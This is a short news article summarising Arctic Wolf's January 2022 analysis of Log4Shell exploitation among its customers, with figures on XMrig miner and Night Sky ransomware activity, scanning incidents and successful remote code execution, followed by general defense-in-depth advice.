Nearly 100 percent Log4Shell vulnerability CVE-2021-44228 post-compromise behaviors have been linked to attempted installation of the XMrig cryptocurrency miner and Night Sky ransomware campaigns associated with the Aquatic Panda threat actor, according to an analysis of more than 2,300 Arctic Wolf customers performed in January 2022.
The presence of XMrig indicates that a cybercriminal can exploit Log4Shell to deploy unauthorized applications in an end-user's environment, Arctic Wolf noted. This represents a "much higher severity threat" than a potentially unwanted application (PUA), which is how XMrig is commonly classified.
Comparatively, Arctic Wolf detected a Night Sky payload and associated activity via observations based on attempted PowerShell use and various indicators of compromise (IOCs), the company indicated. It found Night Sky IOCs across eight customers.
Other notable findings from Arctic Wolf's Log4Shell analysis included:
- 29,338 unique incidents of adversarial scanning for Log4Shell were discovered as of Jan. 25, 2022, all of which were focused on 807 customers.
- Less than 2.5 percent less of customers were still susceptible to Log4Shell exploits.
- There was a successful remote code execution in 252 incidents.
How to Protect Against Log4Shell
Strong security practices play a key role in being able to mitigate Log4Shell exploits and other evolving threats and risks before an organization's IT infrastructure is compromised, Arctic Wolf stated. With a "defense-in-depth approach," an organization can guard against such issues.
Furthermore, an organization must explore ways to continuously improve its security posture, Arctic Wolf said. It also must use a combination of human expertise and technology to protect against cyberattacks now and in the future.
Meanwhile, many third-party scanner tools are available to help MSSPs and MSPs combat Log4Shell. Some of these tools focus exclusively on threat identification, detection, remediation and reporting.